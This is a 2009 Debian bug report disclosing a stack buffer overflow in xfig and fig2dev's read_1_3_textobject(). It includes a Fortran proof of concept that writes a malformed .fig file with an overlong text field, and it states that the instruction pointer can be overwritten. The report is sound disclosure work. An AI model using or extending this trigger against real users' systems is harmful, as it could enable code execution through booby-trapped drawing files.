Bug#559274: xfig: buffer overflow in read .fig file

Thu, 03 Dec 2009 01:25:56 -0800 

Subject: xfig: buffer overflow in read .fig file
Package: xfig
Version: 1:3.2.5-rel-3
Severity: grave
Justification: user security hole
Tags: security

xfig and fig2dev in transfig package will buffer overflow when read
.fig file. see poc file including. compile gfortran.

-- PEDAMACHEPHEPTOLIONES & D.B. COOPER

-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-686-bigmem (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages xfig depends on:
ii  libc6                    2.7-18          GNU C Library: Shared libraries
ii  libjpeg62                6b-14           The Independent JPEG Group's JPEG
ii  libpng12-0               1.2.27-2+lenny2 PNG library - runtime
ii  libx11-6                 2:1.1.5-2       X11 client-side library
ii  libxi6                   2:1.1.4-1       X11 Input extension library
ii  libxpm4                  1:3.5.7-1       X11 pixmap library
ii  libxt6                   1:1.0.5-3       X11 toolkit intrinsics library
ii  xaw3dg                   1.5+E-17        Xaw3d widget set

Versions of packages xfig recommends:
ii  transfig                 1:3.2.5-rel-3.1 Utilities for converting XFig figu
ii  xfig-libs                1:3.2.5-rel-3   XFig image libraries and examples

-- no debconf information

       PROGRAM XFIG_POC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C      XFIG <= 3.2.5B BUFFER OVERFLOW
C      TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C      WWW.XFIG.ORG
C
C      AUTHORS:
C      * PEDAMACHEPHEPTOLIONES <pedamachepheptolio...@gmail.com>
C      * D.B. COOPER
C
C      PROBLEM:
C      A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C      WHEN READING MALFORMED .FIG FILES
C      EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C      TEST:
C      xfig plane.fig
C      fig2dev -L png plane.fig
C      (IT DOESN'T HAVE TO BE "PNG")
C
C      SOLUTION:
C      DON'T TAKE .FIG CANDY FROM STRANGERS
C
C      OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

       INTEGER I
       CHARACTER(LEN=167) :: STR

       DO 10 I=1,167
       STR(I:I)='Z'
10     CONTINUE

       OPEN(11,FILE='plane.fig')
       WRITE(11,*) '0 1 2 3'
       WRITE(11,*) '4'
       WRITE(11,*) '1 2 3 4 5 6 7 '//STR
       CLOSE(11)

       WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'

       END PROGRAM XFIG_POC

Reply via email to